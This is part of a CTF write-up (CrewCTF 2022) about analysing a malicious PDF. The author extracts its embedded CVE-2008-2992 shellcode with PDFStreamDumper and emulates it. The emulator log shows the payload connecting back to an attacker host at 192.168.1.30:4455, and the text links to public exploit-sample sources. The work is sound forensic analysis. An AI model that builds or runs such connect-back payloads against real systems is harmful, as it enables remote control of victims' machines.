## Pt. 2

For this part, we need to find out the Attackers IP. As there is no connection info in the Autopsy report, I eventually realized, that the pdf itself must contain the attacker IP to send something back to him.

I found this [file](https://github.com/mobmewireless/origami-pdf/blob/master/samples/exploits/cve-2008-2992-utilprintf.rb) that was used to create the pdf but I was not able to find out how to extract the shellcode out of it at first sight. Then I searched a little more and found this [website](https://www.adlice.com/infected-pdf-extract-payload/).

Before using that one, I first wanted to try to do it with https://github.com/PCsXcetra/DerbyCon-2019Files which did not work...

To finally solve the challenge, I installed [PDFStreamDumper](http://sandsprite.com/blogs/index.php?pid=57&uid=7), highlighted the shellcode inside of the pdf (one of the objects at the left)

And then opened the Javascript UI to analyze the shellcode

I ran it and got the IP as the output!

```
Loaded 400 bytes from file sample.sc
Initialization Complete..
Max Steps: 2000000
Using base offset: 0x401000

401348 LoadLibraryA(ws2_32)
401358 WSAStartup(190)
401375 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
401381 connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07
401381 connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07
401381 connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07
401381 connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07

Stepcount 2000001
```

Solved!

Original writeup (https://github.com/xXLeoXxOne/writeups/blob/main/CrewCTF%202022/PolicyViolation.md).